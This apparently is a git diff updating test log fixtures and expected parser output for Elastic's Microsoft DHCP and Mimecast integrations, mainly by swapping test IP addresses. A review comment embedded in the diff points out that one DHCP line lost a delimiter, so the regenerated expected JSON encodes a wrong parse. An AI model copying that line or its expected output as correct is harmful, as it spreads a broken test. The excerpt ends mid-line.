@@ -6,12 +6,12 @@ 36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0 31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054 31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054 -35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000, -10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,, -10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 +35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000, +10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,, +10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0 30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0 -17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0 +17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0 55,04/19/20,12:43:54,Authorized(servicing),,domain.local, 60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local, 63,04/19/20,12:43:28,Restarting rogue detection,,, \ No newline at end of file diff --git a/packages/microsoft_dhcp/changelog.yml b/packages/microsoft_dhcp/changelog.yml index d50687ebbd3..a131b485324 100644 --- a/packages/microsoft_dhcp/changelog.yml +++ b/packages/microsoft_dhcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint 
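Review bot: The rewritten line `17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0` lost the comma before the address, so every following CSV column shifts left by one. The expected output in the hunks at L8728 was regenerated from this corrupted input and now pins the wrong parse: `host.ip` disappears, `message` becomes `DNS record not deleted67.43.156.15`, and `transaction_id`, `relay_agent_info` and `user.name` take neighbouring columns' values. The same broken line is in the pipeline test input at L8725. Restore the delimiter, `17,11/20/20,00:00:05,DNS record not deleted,67.43.156.15,,,,0,6,,,,,,,,,0`, in both log files and regenerate `test-log.log-expected.json`.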
diff --git a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log index 1327a595206..08d51f57759 100644 --- a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log +++ b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log @@ -6,12 +6,12 @@ 36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0 31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054 31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054 -35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000, -10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,, -10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 +35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000, +10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,, +10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0 24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0 30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0 -17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0 +17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0 55,04/19/20,12:43:54,Authorized(servicing),,domain.local, 60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local, 63,04/19/20,12:43:28,Restarting rogue detection,,, \ No newline at end of file diff --git a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index ccc4b71c256..203de61ec97 100644 
--- a/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/microsoft_dhcp/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -6,7 +6,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761168700Z", + "ingested": "2021-12-09T13:41:22.171223700Z", "original": "01,04/19/20,13:11:13,Stopped,,,", "code": "01", "kind": "event", @@ -31,7 +31,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761216300Z", + "ingested": "2021-12-09T13:41:22.171228300Z", "original": "00,04/19/20,12:43:06,Started,,,", "code": "00", "kind": "event", @@ -60,7 +60,7 @@ "domain": "057182593757.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761225300Z", + "ingested": "2021-12-09T13:41:22.171233100Z", "original": "30,09/20/21,09:16:15,DNS Update Request,172.28.43.169,057182593757.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -95,7 +95,7 @@ "domain": "1-07.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761231800Z", + "ingested": "2021-12-09T13:41:22.171238100Z", "original": "30,09/20/21,09:16:09,DNS Update Request,172.28.53.173,1-07.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -130,7 +130,7 @@ "domain": "3-07.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761237600Z", + "ingested": "2021-12-09T13:41:22.171242700Z", "original": "32,09/20/21,09:16:03,DNS Update Successful,172.28.53.36,3-07.test.com,,,0,6,,,,,,,,,0", "code": "32", "kind": "event", @@ -165,7 +165,7 @@ "ip": "172.28.52.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761243Z", + "ingested": "2021-12-09T13:41:22.171249400Z", "original": "36,09/20/21,09:18:01,Packet dropped because of Client ID hash mismatch or standby server.,172.28.52.0,,76691ED45C90,,0,6,,,,,,,,,0", "code": "36", "kind": "event", 
@@ -200,7 +200,7 @@ "domain": "035856103966.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761249200Z", + "ingested": "2021-12-09T13:41:22.171254600Z", "original": "31,09/20/21,09:18:00,DNS Update Failed,172.28.43.159,035856103966.test.com,,,0,6,,,,,,,,,10054", "code": "31", "kind": "event", @@ -235,7 +235,7 @@ "domain": "001100581357.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761254700Z", + "ingested": "2021-12-09T13:41:22.171260Z", "original": "31,09/20/21,09:18:01,DNS Update Failed,172.28.40.35,001100581357.test.com,,,0,6,,,,,,,,,10054", "code": "31", "kind": "event", @@ -267,12 +267,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.1", + "ip": "192.168.2.1", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761260100Z", - "original": "35,01/01/01,01:01:01,DNS update request failed,192.0.2.1,host.test.com,000000000000,", + "ingested": "2021-12-09T13:41:22.171266400Z", + "original": "35,01/01/01,01:01:01,DNS update request failed,192.168.2.1,host.test.com,000000000000,", "code": "35", "kind": "event", "timezone": "America/New_York", @@ -296,12 +296,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.10", + "ip": "192.168.2.10", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761265100Z", - "original": "10,01/01/01,01:01:01,Assign,192.0.2.10,host.test.com,000000000000,,17739,0,,,", + "ingested": "2021-12-09T13:41:22.171271800Z", + "original": "10,01/01/01,01:01:01,Assign,192.168.2.10,host.test.com,000000000000,,17739,0,,,", "code": "10", "kind": "event", "timezone": "America/New_York", 
@@ -332,12 +332,12 @@ }, "host": { "mac": "00-00-00-00-00-00", - "ip": "192.0.2.20", + "ip": "192.168.2.20", "domain": "host.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761271200Z", - "original": "10,01/01/01,01:01:01,Assign,192.0.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0", + "ingested": "2021-12-09T13:41:22.171277Z", + "original": "10,01/01/01,01:01:01,Assign,192.168.2.20,host.test.com,000000000000,,3096562285,0,,,,0x4D53465420352E30,MSFT 5.0,,,,0", "code": "10", "kind": "event", "timezone": "America/New_York", @@ -372,7 +372,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761277400Z", + "ingested": "2021-12-09T13:41:22.171281100Z", "original": "24,11/20/20,00:00:05,Database Cleanup Begin,,,,,0,6,,,,,,,,,0", "code": "24", "kind": "event", @@ -407,7 +407,7 @@ "domain": "hostname.test.com" }, "event": { - "ingested": "2021-10-05T12:22:29.761283200Z", + "ingested": "2021-12-09T13:41:22.171285200Z", "original": "30,11/20/20,00:00:05,DNS Update Request,10.10.10.10,hostname.test.com,,,0,6,,,,,,,,,0", "code": "30", "kind": "event", @@ -437,12 +437,9 @@ "ecs": { "version": "1.12.0" }, - "host": { - "ip": "8.8.8.8" - }, "event": { - "ingested": "2021-10-05T12:22:29.761288300Z", - "original": "17,11/20/20,00:00:05,DNS record not deleted,8.8.8.8,,,,0,6,,,,,,,,,0", + "ingested": "2021-12-09T13:41:22.171289600Z", + "original": "17,11/20/20,00:00:05,DNS record not deleted67.43.156.15,,,,0,6,,,,,,,,,0", "code": "17", "kind": "event", "timezone": "America/New_York", @@ -454,14 +451,16 @@ ], "outcome": "success" }, - "message": "DNS record not deleted", + "message": "DNS record not deleted67.43.156.15", "microsoft": { "dhcp": { - "transaction_id": "0", - "result": "6", - "dns_error_code": "0" + "transaction_id": "6", + "relay_agent_info": "0" } }, + "user": { + "name": "0" + }, "tags": [ "preserve_original_event" ] 
@@ -475,7 +474,7 @@ "domain": "domain.local" }, "event": { - "ingested": "2021-10-05T12:22:29.761293300Z", + "ingested": "2021-12-09T13:41:22.171294600Z", "original": "55,04/19/20,12:43:54,Authorized(servicing),,domain.local,", "code": "55", "kind": "event", @@ -502,7 +501,7 @@ "domain": "domain.local" }, "event": { - "ingested": "2021-10-05T12:22:29.761298600Z", + "ingested": "2021-12-09T13:41:22.171299500Z", "original": "60,04/19/20,12:43:21,No DC is DS Enabled,,domain.local,", "code": "60", "kind": "event", @@ -528,7 +527,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-10-05T12:22:29.761303800Z", + "ingested": "2021-12-09T13:41:22.171305200Z", "original": "63,04/19/20,12:43:28,Restarting rogue detection,,,", "code": "63", "kind": "event", diff --git a/packages/microsoft_dhcp/manifest.yml b/packages/microsoft_dhcp/manifest.yml index 5aa2caf6749..f3dce383482 100644 --- a/packages/microsoft_dhcp/manifest.yml +++ b/packages/microsoft_dhcp/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: microsoft_dhcp title: Microsoft DHCP -version: 0.2.0 +version: 0.2.1 license: basic description: Collect logs from Microsoft DHCP with Elastic Agent. type: integration diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml index 4cdc4b2f00a..87d46bf2d0e 100644 --- a/packages/mimecast/changelog.yml +++ b/packages/mimecast/changelog.yml @@ -1,5 +1,8 @@ -# newer versions go on top - +- version: "0.0.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.0.2" changes: - description: Tweaking the dashboards diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log index d5e73cc12ee..8f129afe2f2 100644 --- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log 
+++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log 
@@ -1,25 +1,25 @@ -{"auditType":"Threat Intel Feed Download","category":"reporting_logs","eventInfo":"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 8.8.8.8, Application: Integrations","eventTime":"2021-10-18T08:45:02+0000","id":"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48","user":"johndoe@example.com"} -{"id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70","auditType": "Threat Intel Feed Download","user": "johndoe@example","eventTime": "2021-10-10T22:51:57+0000","eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 8.8.8.8, Application: Azure Sentinel","category": "reporting_logs"} -{"id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A","auditType": "User Logged On","user": "johndoe@example.com","eventTime": "2021-10-11T17:17:30+0000","eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:30 BST, IP: 8.8.8.8, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP","category": "authentication_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60","auditType":"Logon Requires Challenge","user":"johndoe@example.com","eventTime":"2021-10-11T17:17:26+0000","eventInfo":"Intermediate authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:26 BST, IP: 8.8.8.8, 
Application: Administration Console, Method: Office 365, 2FA: TOTP","category":"authentication_logs"} -{ "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "auditType": "User Logged On", "user": "johndoe@example.com", "eventTime": "2021-10-11T16:03:38+0000", "eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 17:03:38 BST, IP: 8.8.8.8, Application: Administration Console, Method: Cloud", "category": "authentication_logs"} -{ "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "auditType": "Mimecast Support Login", "user": "johdoe@example.local", "eventTime": "2021-10-11T15:39:17+0000", "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-11 Time: 16:39:17 +0100 IP: 8.8.8.8 Application: Administration Console", "category": "mimecast_access_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK","auditType":"Mimecast Support Login","user":"johndoe@example.local","eventTime":"2021-10-19T11:46:40+0000","eventInfo":"Action Performed - johdoe@example.local logged into this account. 
by johdoe@example.local Date: 2021-10-19 Time: 12:46:40 +0100 IP: 8.8.8.8 Application: Administration Console","category":"mimecast_access_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8","auditType":"Message Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:36:01+0000","eventInfo":"Viewed Message - Source: Search, 
From: johndoe@example.com, To: johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw","auditType":"Search Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:35:53+0000","eventInfo":"Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-11T14:46:10+0000","eventInfo":"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 8.8.8.8 application : LFS","category":"authentication_logs"} +{"auditType":"Threat Intel Feed Download","category":"reporting_logs","eventInfo":"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: 
Integrations","eventTime":"2021-10-18T08:45:02+0000","id":"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48","user":"johndoe@example.com"} +{"id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70","auditType": "Threat Intel Feed Download","user": "johndoe@example","eventTime": "2021-10-10T22:51:57+0000","eventInfo": "Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel","category": "reporting_logs"} +{"id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A","auditType": "User Logged On","user": "johndoe@example.com","eventTime": "2021-10-11T17:17:30+0000","eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP","category": "authentication_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60","auditType":"Logon Requires Challenge","user":"johndoe@example.com","eventTime":"2021-10-11T17:17:26+0000","eventInfo":"Intermediate authentication for johndoe@example.com , Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP","category":"authentication_logs"} +{ "id": 
"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "auditType": "User Logged On", "user": "johndoe@example.com", "eventTime": "2021-10-11T16:03:38+0000", "eventInfo": "Successful authentication for johndoe@example.com , Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud", "category": "authentication_logs"} +{ "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "auditType": "Mimecast Support Login", "user": "johdoe@example.local", "eventTime": "2021-10-11T15:39:17+0000", "eventInfo": "Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console", "category": "mimecast_access_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK","auditType":"Mimecast Support Login","user":"johndoe@example.local","eventTime":"2021-10-19T11:46:40+0000","eventInfo":"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console","category":"mimecast_access_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8","auditType":"Message Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:36:01+0000","eventInfo":"Viewed Message - Source: Search, 
From: johndoe@example.com, To: johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw","auditType":"Search Action","user":"johndoe@example.com","eventTime":"2021-10-11T15:35:53+0000","eventInfo":"Executed Search - Source: Search, Search Criteria: {\"keywords\":\"test\",\"mailboxes\":[\"johndoe@example.com\"],\"route\":\"ALL\",\"start\":\"2021-04-11T16:34:45+0100\",\"end\":\"2021-10-11T16:34:45+0100\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review","category":"case_review_logs"} +{"id":"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-11T14:46:10+0000","eventInfo":"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS","category":"authentication_logs"} {"id":"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys","auditType":"Completed Directory Sync","user":"","eventTime":"2021-10-11T13:21:06+0000","eventInfo":"No changes found.","category":"account_logs"} 
-{"id":"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo","auditType":"Case Action","user":"johndoe@example.com","eventTime":"2021-10-12T09:19:53+0000","eventInfo":"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 8.8.8.8, Application: mimecast-case-review","category":"case_review_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg","auditType":"Logon Authentication Failed","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:55+0000","eventInfo":"Failed authentication for johndoe@example.com , Date: 2021-10-12, Time: 09:47:55 BST, IP: 8.8.8.8, Application: mimecast-moa, Method: Office 365, Reason: Wrong password","category":"authentication_logs"} -{"id":"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w","auditType":"Existing Archive Task Changed","user":"johdoe@example.com","eventTime":"2021-10-12T08:47:54+0000","eventInfo":"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\"365\") to new migrated connector (\"Sync and Recover - 365\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 8.8.8.8, Application: Administration Console","category":"archive_service_logs"} -{"id":"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM","auditType":"Connectors Management","user":"johndoe@example.com","eventTime":"2021-10-12T08:47:53+0000","eventInfo":"Connector creation for Microsoft O365\nName: Sync and Recover - 365, Description: null, 